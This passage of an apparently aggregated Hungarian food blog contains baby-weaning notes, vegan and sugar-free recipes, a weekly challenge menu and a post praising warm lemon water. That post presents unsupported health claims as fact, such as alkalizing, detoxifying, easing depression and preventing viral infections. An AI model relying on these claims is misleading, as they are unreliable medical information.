palacsintákat. A tésztát egyenletesen eloszlatjuk a sütőben, majd mikor a széle elválik tőle, és megmozgatva nem tapad rá, megfordítjuk a palacsintákat. A másik oldalukat is megsütjük. Megtöltjük lekvárral, vagy egyéb töltelékkel, friss gyümölcsökkel kiegészítve fogyasztjuk.

Táplálj helyesen édesanyám! (2. rész)

2014. április 22. Zizi kalandjai 

Táplálj helyesen édesanyám! (2. rész) Bambusz tálka és kanál {Shakshuka}, konyharuha {H&M Home}, csörgő {Erdélyből} Január végén írtam az első részt és azóta sokan jeleztétek, hogy várjátok már a második részt. Annyi információ és tapasztalat kering a fejemben, azt sem tudom hol kezdjem. Igyekszem részekre bontani, hogy könnyen átlátható legyen. Továbbra is jelzem, hogy a leírtak a saját tapasztalataimból fakadnak és tájékoztató jellegűek. Mindenki kérje ki az anyukája, nagymamája, védőnője, gyermekorvosa tapasztalatait is, meg okosodjunk könyvekből is és ahogy említettem, cselekedjünk aszerint, amit a szívünk diktál. Január végén majdnem 9 hónapos volt Ádi, most meg már majdnem 12 hónapos. Ezalatt az idő alatt sok minden történt a táplálkozás terén (is)… haladjunk szép sorjában. Receptek pedig a bejegyzés végén! Zöldségek A hozzátáplálást ősszel kezdtük, így a szezonalitást követve az alábbiakat kóstolta meg szépen sorban Ádi: répa, sütőtök, cékla, paszternák, zeller, petrezselyemgyökér. Nagyjából ez volt a választék, de leginkább répa, paszternák és sütőtök volt a nyerő hármas. Aztán kb. 9,5 hónapos kortól kipróbáltuk a spenótot (sikerült friss bio spenótot szereznünk a piacon). Egész jól fogadta, csak magában kevés vízzel megpárolva, majd a végén egy kis mandulatejet hozzáöntve pépesre turmixoltam. Néhány nappal később sütőtök-paszternák kombóhoz adtam spenótot harmadiknak. Így is ízlett neki. Aztán persze volt olyan, hogy nem tetszett neki magában a spenót, szóval tartottam néhány nap szünetet, majd újra próbáltam és csodák csodájára, ízlett. 10 hónapos kora után kipróbáltam a csicsókát is, amit csak vízben magában puhára pároltam és összeturmixoltam. A csicsókának nem szeretem az illatát, az ízét is csak levesben más zöldségekkel, fűszerekkel összefőzve. Hát, Ádinak bejött totál natúran megfőzve. Utána kevertem neki almával, sütőtökkel, répával, mikor mi volt itthon. Örültem, hogy végre találtam egy új szezonális zöldséget és kicsit bővíthettem a menüt. Bár lehet, hogy csak én untam már az eddigieket és Ádi még nem. 10,5 hónapos korától aztán készítettem neki zöldség krémlevest, amibe került répa, karfiol, vöröshagyma, ezt megfőztem, egy csipet sót tettem bele és pürésítettem. A vöröshagyma ebben az esetben igen jó “fűszernek” bizonyult, ez már alapból egy olyan leves volt, amit én is szívesen ettem. Ebben az időszakban adtam neki kipróbálásra bio uborka karikát (meghámozva) rágcsálni és egy kevés lucernacsírát. Az uborka jól jön fogzás idején, mert hűti a fogínyt, csak óvatosan bánjunk vele, hogy ne harapjon le belőle túl nagy darabot a baba, szóval érdemes mindig résen lenni. A csírából persze a fele a földön végezte, de azért valamennyi jutott Ádi szájába is. Előke {Franck & Fischer a Monkie-tól} Egyszer főztem magunknak fokhagymás paradicsomos (konzerv hámozott paradicsomból – igen, tudom, hogy a paradicsom gyümölcs, de most a leveleskel/­­spenót paradicsomos tészta miatt a zöldségek közé került) tésztát, amibe pirítottam leveleskelt is, csak egy kis sót tettem bele és amikor kész volt, kivettem belőle egy adagot Ádinak, a maradékot pedig befűszereztem magunknak. Ádi adagját pürésítettem és így ette, de persze nem ette meg mindet első alkalommal. Készült ugyanez csak leveleskel helyett spenótot főztem a paradicsomos szószba. A zöldség krémleveseket ebben az időben elég gyakran variáltam, volt, hogy répa, petrezselyemgyökér, póréhagyma, fokhagyma és spenót került bele. Igen, finom volt, Ádinak is bejött. 11 hónapos kora után, amikor már nagyon untam a szezonális zöldségeket, akkor úgy éreztem muszáj újítanom és fagyasztott zöldborsóból főztem Ádinak krémlevest. Nagyon bejött neki. Sőt nagy adagot főztem és nekünk is ez volt az ebédünk. Aztán kevertem a zöldborsót is más zöldségekkel, majd a spárga piacokon való megjelenésekor kaptam az alkalmon és kipróbáltam a spárgát is, persze csakis más zöldségekkel és egy csipet sóval összefőzve, majd pürésítve. Néha-néha kapott még egy kis salátát, amit többnyire tőlünk kuncsorgott el, amikor látta, hogy azt eszünk. Ja és a múltkor elkezdett rágcsálni egy szál zsenge tavaszi újfokhagymát! Ízlett neki! Itt tartunk most zöldség téren… várom már a tök, cukkini, brokkoli, padlizsán, paprika és paradicsom szezont! Gyümölcsök Elég sokáig Ádi csak almát evett, majd 10 hónapos kora körül bevezettük nála a körtét is. Nagyon szereti mindkét gyümölcsöt. Eszi nyersen is magukban, kásákhoz keverve, valamint az almából levest (de nevezhetjük kompótnak) is főztem neki. Cumisüveg {Lifefactory} 10,5 hónapos kora után, amikor a szoptatást kicsit csökkenteni kezdtem és növelni kellett a folyadék fogyasztást, akkor ebéd után fél órával adtam neki kifilézett narancsot (Lidl-ben lehet kapni bio, kezeletlen héjú narancsot elég jó áron). Az édes, szaftos, lédús narancs falatkákat imádja, nem tud betelni vele. Háromszor pedig adtam neki bio banánt, amit szintén nagyon szeret. 11 hónapos kora után pedig adtam neki finom érett avokádót. Sikerült “ready-to-eat” avokádóhoz jutnom, amely annyira, de annyira finom, hogy magában só, fűszerek nélkül is eteti magát. Természetesen Ádinak is bejött. Gabonák, glutén, pékáru 10 hónapos koráig csak gluténmentes gabonákat főztem Ádinak: kölest, barnarizst és hajdinát. Ezeket főztem meg (kb. három evőkanálnyi elég két étkezésre) bő vízben és puha, kásás állagúra készítettem. Én soha nem adtam magában – noha lehetne -, mindig zöldségpüré vagy például az almaleves mellé adtam. 10 hónapos kora után kapott először glutént tartalmazó ételt. Főztem neki tésztát és ezt spenóttal, zöldségkrémmel, spenótos paradicsomszósszal tálaltam. Ádinak mindegyik változat ízlik. Magyar tésztát választottam – egy barátnőm, Adri javaslatára -, amely nagyon gyorsan megfő és természetesen tojásmentes (a csomagolására nincs ráírva, de a weboldalon szerepel, hogy nyomokban tartalmazhat tojást… remélem azért, hogy nem!). A tésztát jó puhára főzöm és apró darabkákra vágom, erre szedem rá a zöldséges szószt. Ádi szeret nyammogni a tészta darabkákon, de egyébként a főtt tésztát is lehetne pürésíteni, de én nem tettem, ahogyan a főtt gabonákat sem. 10,5-11 hónapos kora körül adtam neki először pékárut. A Piszkei Ökonál vettem teljeskiörlésű élesztő nélküli tönkölybúza kiflit, amit karikákra és apró falatokra vágtam és vagy avokádóval vagy anyukám cukormentes szilvalekvárjával kentem meg. Ez kiváló étel uzsonnára. Ezenkívül a Lét-Reform pékségnél szoktam venni teljeskiörlésű élesztő nélküli cukormentes meggyes, szilvás vagy almás rétest. Apró falatokra tépkedem Ádinak és így eszi meg néha reggelire, de többnyire ebéd után desszertnek vagy uzsonnára. Sütöttem már neki baba palacsintát is, amelyben almapüré, rizstej és zabliszt van. Első alkalommal reggelire készítettem és az apró palacsintákból megevett három darabot. Második alkalommal pedig uzsonnára készült. Odaadtam neki egy egészet, de csak forgatta, úgyhogy inkább én tépkedtem kicsi falatokra és tettem a szájába. Nyelte, mint kacsa a nokedlit. Gyorsan összedobható és ha megyünk valahova, akkor is könnyen magunkkal tudjuk vinni. Arról nem is beszélve, hogy szerintem minden gyerek szereti. 10 hónapos kora előtt rizspehelyből, 10 hónapos kora után már zabpehelyből is főztem neki kását reggelire. Általában reszelt almát vagy körtét keverek hozzá és így adom Ádinak. Sokszor együtt főzzük a miénkkel, így már mi is megszoktuk, hogy teljesen cukormentes együk a kását, csak egy kis gyümölccsel édesítjük és nekünk is nagyon bejön. Ezeken kívül főzök kását teljeskiörlésű tönkölydarából is (ebből vagy ebből). Folyadék Az anyatejen kívül többnyire szűrt vizet vagy forrásvizet adok Ádinak. Iszik cukormentes bio meggylevet és rizstejet. Mandulatejet ivásra még nem kapott, de van, hogy ezzel készítem a reggeli kásáját, tehát kipróbálta már. Nagyon oda kell figyelni, hogy az anyatej csökkentése után igyon eleget, így napközben minden órában igyekszek megitatni vele egy kevés folyadékot. Zsiradék Közvetve nem adok, de pároltam már vöröshagymát, fokhagymát hidegen sajtolt extra szűz olívaolajon, a palacsintákat pedig nagyon kevés kókuszszírban szoktam megsütni. Fűszerek Amit eddig használtam: fahéj (almaleveshez, reggeli kásákhoz) és zöldfűszerek (kakukkfű, bazsalikom). Bolti bébiételek Ahogy korábban említettem, tartok itthon vészhelyzet esetére bio bébiételeket (sütőtök almával, alma, körte, körte csipkebogyóval, répa, őszibarack), arra az esetre, ha minden összejön és nincs időm főzni vagy valami, amit főztem és nem ízlik Ádinak (mostanában nem történik ilyen), akkor legyen helyette gyors alternatíva. Jól olvassátok el mindig az összetevőket, hogy ne legyen benne cukor! Tárolás Én többnyire egy napra vagy két napra főzök egy ételt Ádinak. Hűtőben tárolom maximum két napig, de mielőtt odaadnám neki az előző napos ételt, mindig megkóstolom, hogy jó-e még! Természetesen le is lehet fagyasztani például jégkockatartókba téve, de mivel nekem nagyon kicsi a mélyhűtő fakkom, ezért mindig frissen főzök ebédet és nem fagyasztok le megmaradt adagokat.  ***** És akkor jöjjenek a receptek… Ádi eléggé  haspók mostanában, szóval a mennyiségek az ő adagját tükrözik. Lehet, hogy más babának ez több étkezésre elég, de az is elég, hogy kevesebbre, mert még nagyobb haspók, mint Ádi! Spenótpüré Hozzávalók: - 1 nagy marék spenót - kevés víz - 2-3 evőkanál mandula- vagy rizstej - ha már fűszerezünk, akkor csipet só és 1 gerezd fokhagyma, felaprítva Egy lábasban pároljuk össze a spenótot a fokhagymával és a vízzel. Sózzuk. Adjuk hozzá a mandulatejet és pürésítsük simára. Ezt adhatjuk magában vagy tésztával, kölessel, barnarizzsel tálalva. Almás baba palacsinta Hozzávalók kb. 5 darabhoz: - 3 evőkanál frissen reszelt almapüré - 2 evőkanál rizstej - 5 evőkanál zabliszt - 1 teáskanál kókuszzsír Egy tálban keverjük össze az almapürét a rizstejjel. Adjuk hozzá a lisztet. Sűrű “tésztát” kell kapnunk. Egy teflonserpenyőt hevítsünk fel, olvasszuk fel a kókuszzsírt és kanalazzunk (evőkanálnyi) adagokat a tésztából a serpenyőbe. Kanállal lapítsuk kerek formára és süssük, amíg megbarnul és könnyen átfordítható lesz. Süssük a másik oldalukon is néhány percig a palacsintákat. Zöldborsó krémleves Hozzávalók: - 1 bögre zöldborsó - 1/­­4 darab vöröshagyma, felaprítva - 1 gerezd fokhagyma, felaprítva - csipet só - víz - mandulatej vagy rizstej - 2 teáskanál extra szűz olívaolaj - kevés kakukkfű (opcionális) - 1/­­2 marék spenót (opcionális) Egy lábasban hevítsük fel az olívaolajat és pároljuk meg a vöröshagymát és fokhagymát néhány perc alatt. Adjuk hozzá a zöldborsót, öntsük fel annyi vízzel, amennyi éppen ellepi. Sózzuk és főzzük a borsót puhára. Ha elkészült pürésítsük simára és hígítsuk egy kevés mandula- vagy rizstejjel. Én úgy szeretem, ha elég sűrű, mert így könnyebb Ádi szájába kanalazni. Néhányszor adtam már hozzá friss spenótot, amit a főzés végén adtam hozzá, majd ezzel együtt pürésítettem. Többnyire adok hozzá valamilyen főtt gabonát. Rizs- vagy zabpehely kása Hozzávalók 1 adaghoz: - 3 evőkanál rizs- vagy zabpehely - 1 alma vagy körte, meghámozva, lereszelve - mandula- vagy rizstej - 1 teáskanál mandulavaj (opcionális) - csipet fahéj Tegyük a lábasba a rizspelyhet annyi rizstejjel, amennyi ellepi. Ha főzés során nagyon besűrűsödik, akkor adjunk még hozzá egy kevés tejet. Mielőtt elzárjuk a gázt adjuk hozzá a fahéjat és a mandulavajat. Tálaláskor keverjük hozzá a reszelt almát vagy körtét. Tönkölykása Hozzávalók 1 adaghoz: - 3 evőkanál tönkölydara - 1 alma vagy körte, meghámozva, lelreszelve - mandula- vagy rizstej - csipet fahéj Tegyük egy lábasba a tönkölydarát a mandulatejjel és fahéjjal. Főzzük sűrű kása állagúra. Tálaláskor keverjük hozzá a reszelt almát vagy körtét. Almaleves (vagy almaszósz, amit “kenyérre kenni nem lehet” ) Hozzávalók 2-3 adaghoz: - 2 közepes alma, meghámozva, kicsumázva, apró kockákra felvágva - 100 ml víz - kb. 200-300 ml rizs- vagy mandulatej - 1 evőkanál tápióka keményítő - csipet fahéj - 1/­­2 evőkanál frissen facsart citromlé Ezt a levest soha nem tudom egyforma állagúra főzni, hol sűrűbb, hol pedig hígabb (majd ti is kitapasztaljátok). Tegyük fel a vizet egy lábasban forrni. Közben a felkockázott almát szórjuk meg fahéjjal és locsoljuk meg a citromlével, keverjük össze és adjuk a vízhez. Vegyük takarékra a lángot és fedő alatt pároljuk az almát puhára. Öntsük hozzá a rizstejet és főzzük tovább. A tápióka keményítőt keverjük simára egy kevés rizstejjel és adjuk a leveshez. Hagyjuk egy kicsit besűrűsödni és tálaljuk (én főtt kölest vagy barnarizst szoktam mellé adni). ——————————– A bejegyzést nem támogatta egyik cég sem! A linkeket azért szúrtam be, mert a termékeket nagyon jónak tartom és úgy gondolom érdemes másoknak is kipróbálniuk.

Fahéjas quinoa - kukoricapehely reggeli

2014. március 27. Vegagyerek 

Fahéjas quinoa - kukoricapehely reggeli Ismét egy sokadik variáció a reggelire.:) A variációk tárháza végtelen, nyugodtan kísérletezz saját kedved és ötleteid szerint is!;) A száraz hozzávalók keverékét akár este is összekeverheted, és másnap reggel csak a gyümölcsöt és a növényi tejet kell hozzáadnod. Vagy készíthetsz szárazon egy nagyobb adagot, csatos üvegbe teszed, és akár 1-2 hétig többször is használhatsz belőle! Fahéjas quinoa - kukoricapehely reggeli Elkészítési idő: kb. 5 perc Hozzávalók (2 főre): 60 g (para)dió, durvára vágva 60 g mazsola 125 g cukormentes kukoricapehely 20 g puffasztott quinoa 1 tk. őrölt fahéj 1 tk. őrölt vanília növényi tej szezongyümölcs Keverd össze a hozzávalókat, és öntsd le tetszés szerinti cukormentes (!) növényi tejjel, szórd meg friss idénygyümölccsel! Alapötlet: Attila Hildmann: Vegan for Youth

2014. tavaszi Vegán Kihívás, 1. hét

2014. március 13. Vegagyerek 

2014. tavaszi Vegán Kihívás, 1. hét Ez a bejegyzés 2014. március 13 - 19. lesz elérhető, utána törlésre kerül!! 1. HETI MENÜ (1-7. NAP):1.   NAP Reggeli: - Diós-erdei gyümölcsös zabkása Ebéd: - rozmaringos főtt csicseri (főtt csicserire kis olívaolaj, citormlé, só, bors, és friss rozmaring, vagy zöldfűszerkeverék), valamilyen gabonával, pl. kuszkusszal és vegyes salátával Vacsora: - brokkolis - vörös káposztás spagetti Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 2.   NAP Reggeli: aszalt sárgabarackos quinoa-amaránt müzli Ebéd: spenótos rizottó Vacsora: édesburgonyás sárgarépakrémleves diós petrezselyempesztóval 1-2 szelet pirított barna kenyérrel) Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 3. NAP Reggeli:1-2 szelet pirított teljes kiőrlésű kenyér valamilyen olajos mag krémmel (pl. mandula, kesudió, szezám), és esetleg cukormentes lekvárral (pl. bio cukormentes szilvalekvár, vagy bio agave sziruppal édesített gyümölcslekvár); friss gyümölcs (ezt áttolhatod uzsonnára is) Ebéd: leves előző napról + csicsókás babfasírt vegyes zöldsalátával Vacsora: paradicsomos-gombás polenta (a receptben a paradicsomot rizs/­­ agave sziruppal édesítsd a nyírfacukor helyett!) Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 4. NAP Reggeli: - Málnás-amarántos szójajoghurt pirított kókusszal (bármilyen szezongyümölccsel készítheted!) Ebéd: - a paradicsomos-gombás polenta előző napról, akár friss salátával kiegészítve Vacsora: - csicsókás babfasírt előző napról friss salátával, vagy nyers zöldségszeletekkel Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 5.   NAP Reggeli: napraforgós-mandarinos reggeli kása Ebéd: paradicsomos szendvics: 2 szelet pirított barna kenyér közé tegyél felszeletelt paradicsomkarikákat, egész bazsalikom leveleket, zöld leveles salátát, csírákat és megkenheted akár tojásmentes kölesmajonézzel is. http:/­­/­­www.vegagyerek.hu/­­2011/­­01/­­tofusalatas-szendvicskrem-es.html Ha gazdagabban szeretnéd megpakolni, akkor egy-két szelet füstölt tofut piríts meg kis olajon, vagy grillezd meg,  pici szójaszósszal ízesítve, és azt is tedd a kenyérbe húspótlóként. Vacsora: tepsiben sült zöldségek: különféle zöldségek, amiket találsz a hűtőben, felaprítva (szezonálisak mehetnek bele nyugodtan, sütőtök, cékla, káposztafélék, répa, stb., figyelj rá, hogy nagy kockákra vágd, ne süljön szét!:-) meglocsolva kis olívaolajjal, hozzá só-bors, és süsd meg a sütőben! Salátát nyugodtan ehetsz hozzá, vagy ha nagyon éhes vagy, valamilyen gabonát is főzhetsz hozzá (rizs, quinoa stb.)! Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 6. NAP Reggeli: kiviszószos almatorony Ebéd: babkrémes-petrezselyempesztós tekercs Uzsonna-desszert: meggyes banánfagyi Vacsora: barna rizsgolyók bazsalikomos kesuszósszal  Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 7. NAP Reggeli: diós-banános hajdinamuffin gabonakávés-natúr szójatejes cappuccinoval Ebéd: csicserikrémes padlizsán-lasagne Uzsonna-desszert: nyers avokádós csokipuding Vacsora:  tökmagpástétom friss zöldség szeletekkel, csíkokkal/­­ teljes kiőrlésű pirítóssal Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint  

Meggyes banánfagyi

2014. március 13. Vegagyerek 

Meggyes banánfagyi Egy rendkívül egyszerű cukormentes édesség, amit csak úgy faltak a gyerekeim is!:) Van egy titkos összetevője, a kakaó, és ez egészen különleges plusz ízt ad neki! Arra viszont figyelj, hogy a fogyasztás előtti napon be kell hozzá tenni a fagyasztóba a banánt, aminek kb. 10 órára van szüksége! Meggyes banánfagyi Elkészítési idő: kb. 10 perc + kb. 10 óra a banán fagyasztásához! Hozzávalók (2 főre): 300 g érett banán 130 g fagyasztott meggy 1/­­2 tk. kakaó 45 g rizsszirup/­­ agave szirup A meghámozott, kisebb darabokra vágott banánokat tegyük egymástól távol egy sütőpapírral letakart tányérra, és rakjuk a fagyasztóba egy éjszakára (kb. 10 óra). Másnap turmixoljuk össze a banánt a többi hozzávalóval együtt egy konyhai aprítógépben. Forrás: Attila Hildmann: Vegan for Youth

Palacsinta Torta: Tej,-tojás,-cukormentes

2014. március 3. Fittanyuka 

Palacsinta Torta: Tej,-tojás,-cukormentes   Mindenki kedvence a palacsinta. Simán, feltekerve, csőben sütve, rakva, tortának… Ez a recept fúzionálja az összes édes palacsinta receptem, ajánlom desszertként: Palacsinta tésztát többfélét elkészíthetünk, de én most egy alap receptet írok le, amelyből 10-12 darab palacsinta lesz, éppen elegendő egy torta elkészítéséhez. Hozzávalók: 500 g világos tönköly liszt késhegynyi szódabikarbóna 1 l víz kókusz olaj a sütéshez Az összetevőket összekeverjük és a palacsintákat egy tapadásmentes edényben egyenként kisütjük.   Töltelékek: 1. Citromos ” túrókrém”  tejmentes, cukormentes: Elkészítése: Katt! 2. Diókrém: Hozzávalók: 100 g darált dió 50 g darált xilit 1/­­2 citrom leve 3 evőkanál kókusz tejszín 1 evőkanál sárgabarack lekvár Az alapanyagokat összekeverjük, lassú tűzön forrásig kissé megfőzzük, állandó kevergetés mellett.   3. Mákkrém: Hozzávalók: 100 g darált mák 50 g darált xilit 1 evőkanál sárgabarack lekvár 1/­­2 bio citrom reszelt héja Az összetevőket összekeverjük és lassú tűzön forrásig, kevergetve kissé megfőzzük.   4. Sárgabarack lekvár xilittel Étcsoki bevonat:  Magas kakaótartalmú kakaópor 4-5 evőkanál 1 evőkanál porrá darált xilit 4 evőkanál kókusz olaj Vízgőz felett az összetevőket összekeverjük. Egy 32 cm-es tortaformában elkezdjük lerakni a palacsinta tortát. A rétegeket tetszőleges sorrendben megkenjük a krémekkel és addig folytatjuk amíg a hozzávalók elfogynak. A tetejét bevonjuk a csokival és egy éjszakára vagy 4-5 óra hosszára a hűtőbe tesszük. Majd lekapcsoljuk a torta pántot és tálalhatjuk a tortát. A tetejét még a bevonás után megszórtam darált mogyoróval. Jó étvágyat:)!          

Vegán köményes vöröslencse krémleves pisztácia pestoval + a második és harmadik hét cukor nélkül

2014. február 23. Zizi kalandjai 

Vegán köményes vöröslencse krémleves pisztácia pestoval + a második és harmadik hét cukor nélkül Totál elmaradásban vagyok, már, ami a beszámolót illeti, de néha magával ragad a hétköznap mókuskereke és a rengeteg tennivaló közül, a blog a végére marad, amikor már nincs erőm hajnal 1-kor kitenni egy új bejegyzést. A receptek állnak sorban, én meg kapkodom a fejem, hogy mikor lesz már végre időm, hogy megosszam veletek. Hát most! A cukormentes kihívás második hete egész jól telt, azonban a tojást annyira megkívántam, hogy muszáj volt ennem tükörtojás formájában. Összesen az első alkalom óta még három alkalommal ettem tojást. Érzem, hogy a teljes vegán életmódra még nem vagyok készen, pedig rengeteg vegán ételt főzök, ilyeneket eszünk, de valahogy a tudat, hogy azért bármikor ehetek egy kis sajtot és tojást is, megnyugtat. Most viszont, hogy “megvontam” magamtól a tejtermékeket és a tojást, nem érzem magam jól. És, ha nem érzem jól magam, hiányoznak ezek az ételek, akkor nem erőszakolom meg a testem, hogy teljesen megvonjam magam ezektől az élelmiszerektől. Igazából tejtermékek közül leggyakrabban sajtot és vajat szoktam enni, tejet már gyerekkoromban sem szerettem, joghurtot/­­kefirt negyedévente egyszer eszem, amikor megkívánom. Egyébként egész jól megbarátkoztam a vegán sajtokkal és a minőségi margarinnal. Tojást pedig többnyire rejtett formában süteményekben eszem, de néha megkívánom a tükörtojást és akkor sütök magamnak egyet… vagy nyáron a tojásos nokedlit fejes salátával. Én úgy működök, hogy, amit megkívánok, azt vagy azonnal vagy egy-két napon belül meg kell csinálnom, mert addig a belső hangom nem  hagy békén és hagyja, hogy kattogjon a fejemben: tojásos nokedli, tojásos nokedli. Nincs mese, muszáj megfőzni. A harmadik hét az édességek utáni sóvárgásról szólt. Például elmentünk egy étterembe, ahol pizzát ettünk és az édességes pultnál megláttam a sajttortát. Na, a belső hang megszólalt: sajttorta, sajttorta. Annyira megkívántam, hogy már szenvedtem. A 70%-os csokikockák is hiányoznak, ez az igazság. Az egyedüli édes nasi a natúr ripsz-ropsz, rajta mandulvajjal és anyukám cukormentes szilvalekvárjával. Néha négy szeletet is megeszek, hogy csillapítsam az édesség utáni vágyamat. Most szombaton a biopiacon megkóstoltunk cukormentes meggyes-mákos és szilvás rétest, valamint almás és gesztenyés pitét (Lét Reform termékei, itt találjátok a választékot és rengeteg a cukormentes süti). Mindegyik almával volt édesítve, teljeskiörlésű lisztből készültek és isteni finomak voltak, főleg a gesztenyés pite. El is határoztam, hogy ezután mindig ezeket esszük szombatonként, mert finomak, elég édesek és vegánok is. Hát itt tartunk… most már vágom a cetlit, hogy még hány nap van hátra a kihívásból. Nem tudom még, hogy mivel törjük meg a cukormentes kihívást, de bőven van terv a fejemben, ugyanis márciusban elkezdem tesztelni Ádi szülinapi tortáját is. Az ízek már nagyjából összeálltak a fejemben, de szeretném tesztelni mielőtt élesben is kivitelezem. Természetesen a torta vegán lesz és valószínűleg cukormentes is, banánnal tervezem édesíteni. Ha jól sikerül, biztosan felkerül majd a blogra is. És akkor jöjjön a recept. Néhány vöröslencse levest már készítettem. Szeretem, mert ezt a fajta lencsét nem kell beáztatni, gyorsan megfő és rengeteg ízvariáció kihozható belőle. Ez a leves nagyon nagy adag, mi I.-vel néhány napig ettük, kiadós és laktató. A pisztácia pesto csak ráadás, anélkül is fogyasztható. A receptet a Kinfolk oldalán találtam. A pisztáciát a Noosti Kft-től kaptam tesztelésre és nagyon meg vagyok elégedve a minőségével. Vegán köményes vöröslencse krémleves pisztácia pestoval Hozzávalók 6 főre: A leveshez: - 3 bögre (kb. 500 g) vöröslencse, jól átmosva - 10 bögre (kb. 2,5 liter) zöldség alaplé - 2 nagy fej vöröshagyma, felaprítva - 5 gerezd fokhagyma, felaprítva - 1 nagyobb alma, meghámozva, csumája eltávolítva és szeletekre vágva - 1 evőkanál köménymag - 1 evőkanál chili pehely - olívaolaj - só, bors A pestohoz: - 1 bögre natúr, hántolt pisztácia, száraz serpenyőben 4-5 perc alatt megpirítva - 3/­­4 bögre petrezselyem, felaprítva - 1/­­4 bögre olívaolaj - 1/­­2 citrom leve - csipet só (A recepthez használt bögre 250 ml-es.) Egy nagy lábasban hevítsünk legalább 1/­­4 bögre olívaolajat, adjuk hozzá a vöröshagymát, majd az almát és 2 teáskanál sót és főzzük 6-8 percig. Ekkor adjuk hozzá a fokhagymát, a köménymagot és a chili pelyhet és főzzük néhány percig, amíg illatos lesz. Adjuk hozzá a vöröslencsét, öntsük bele az alaplevet és fedőt téve rá főzzük kb. 20 percig, amíg a vöröslencse megpuhul. Ha nagyon habzik a teteje, akkor a habot időközönként távolítsuk el a tetejéről szűrőkanállal. Adagokban turmixgépben pürésítsük teljesen simára, majd öntsük vissza a lábasba, ízesítsük, ha szükséges, ha pedig túl sűrűnek találjuk öntsük még hozzá egy kevés vizet. Robotgépben aprítsuk fel a pisztáciát, hagyjunk benne néhány darabos részt. Öntsük egy kis tálba, adjuk hozzá a petrezselymet, az olívaolajat, citromlevet, keverjük jól össze és ízesítsük ízlés szerint. Tálaljuk a levest melegen és tegyünk rá egy keveset a pestoból.

Indítsuk a napot meleg citromos vízzel!

2014. február 18. Zizi kalandjai 

Indítsuk a napot meleg citromos vízzel! Indítsuk a napot egy pohár meleg citromos vízzel… ha elolvassátok a jótékony hatásait, holnap már biztos ezzel kezdetek. Én néhány éve vezettem be a citromos víz ivást, aztán volt egy kis szünet, de nemrég újra elkezdtem és nagyon szeretem. A téli időszakban jól is esik reggel valami savanykás meleg vízzel indítani a napot. Biztosan felébreszt. Bár én soha nem voltam reggeli kávé ivó, szóval nem tudom megmondani, hogy a kávé a hatékonyabb vagy a citromos víz, mindenesetre, nekem bevált a víz. Most a cukormentes hónapban pedig napközben is iszom, mert igen üdítő és frissítő és eltereli a figyelmemet az édesség utáni vágyamról. Én egy bögre vízbe 1/­­4 citromot facsarok, ha sikerül kezeletlen héjú, bio citromot vennem, akkor egy-két szeletet is beleteszek a bögrébe és ezt vízzel kell újra felöntenem és szinte egész napra biztosítja a meleg folyadékot. Figyeljetek rá, hogy a sok citrom – kifacsart leve csak magában fogyasztva – tönkreteheti a fogzománcot, mivel erős a maró hatása, de kivédhetjük ezt, ha a kifacsart citromlevet szívószállal isszuk meg. 1. Turbó lökést ad az immunrendszernek A C-vitamin az immunrendszer kerozinja, és a citrom tele van vele. Amikor stresszesek vagyunk, elsőként a C vitamin szintünk kezd el zuhanni, ezért a szakértők extra C-vitamin bevitelt javasolnak azokon a napokon, amikor a stressznek fokozottan ki vagyunk téve. 2. A kálium kiváló forrása A citromban magas a kálium szint, ami jót tesz a szív egészségének, valamint segíti az agy és az idegek működését. 3. Segíti az emésztést A citromos víz nem csak az egészséges emésztést segíti elő, hanem a toxikus anyagok eltávolításában is hatékony, de a gyomorégés, puffadás, emésztési zavarokra is jó kiváló megoldást kínál. 4. Tisztítja a szervezetet A májat stimuláló hatásán keresztül a méreganyagok szervezetből való kiürítését fokozza. 5. Kiváló lúgosító A citrom egy savas gyümölcs, mégis lúgosít, ugyanis a gyomorba kerülve és a szervezetben lebomolva már kiváló lúgosító hatású. 6. A bőrt folt mentesen tartja A citromlében megtalálható antioxidánsok nem csak a pattanások számát csökkentik, de a ráncokat is! Jól alkalmazható hegek esetén, vagy öregségi foltok megelőzésére is. Mivel méregtelenítő hatású, ezért a bőr szépségét, selymes tapintását is fenntartja. 7. Segít a fogyásban A citrom pektin rostot is tartalmaz, ami csökkenti az éhségérzetet, így segíti a plusz kilókkal való harcot. 8. Csökkenti a gyulladást Ha rendszeresen iszunk citromos vizet, akkor csökkenthetjük a savasságot a szervezetünkben, ami a betegségek egyik fő kiváltója. A citromos víztől az ízületekben felhalmozódó húgysav is csökken, ami az ízületgyulladásokért nagy mértékben felelős. 9. Energialöketet ad Amikor a citromlé bekerül az emésztőrendszerbe, sok energiát ad, ami segít csökkenteni a szorongást és a depressziót. ( Még a citrom illata is nyugtató hatással van az idegrendszerre!) 10. Segít harcolni a vírusos fertőzések ellen A meleg citromos víz a leghatékonyabb módja annak, hogy csökkentsük a vírusos fertőzések kialakulását és megelőzzük a későbbi torokfájást. Plusz, mivel a citromlevet fellendíti az immunrendszert, így a már kialakult vírusos fertőzések leküzdésében is jó társunk lehet.

Villámgyors ebéd + az első hét cukor nélkül

2014. február 10. Zizi kalandjai 

Villámgyors ebéd + az első hét cukor nélkül Nem ez a bejegyzés következett volna, de most átugrunk egy részt, aztán majd visszatérünk arra a bejegyzésre, ami ezután fog következni. Világos? Sokan (főleg otthon lévő anyukák) kértétek, hogy osszak meg olyan recepteket, amelyeknek az elkészítése kevés időt vesz igénybe, így a babák, gyerekek ellátása mellett is tudtok meleg ételt tenni az asztalra. Ez nem könnyű feladat, tudom. Nálunk is trükközést igényel a főzés és néha az ebéd eltolódik vacsorába, mert adagokban tudom elkészíteni, még akkor is, ha kevés időt vesz igénybe. Ádi nem igazán alszik napközben a kiságyában, szóval sétálni kell menni vele és így tud aludni. Szóval nálunk nem működik az, hogy, amíg alszik a baba, addig összedobok egy gyors ebédet. Ez csak akkor valósítható meg, ha I. itthonról dolgozik és elviszi sétálni Ádit, én meg másfél óra alatt összedobom a mi ebédünket, az övét és, ha minden jól megy, még fotózni is tudok, meg elpakolni mindent, ami a fotózással jár. Ha extra gyors vagyok, akkor marad még 5 percem leülni megenni az ebédet vagy 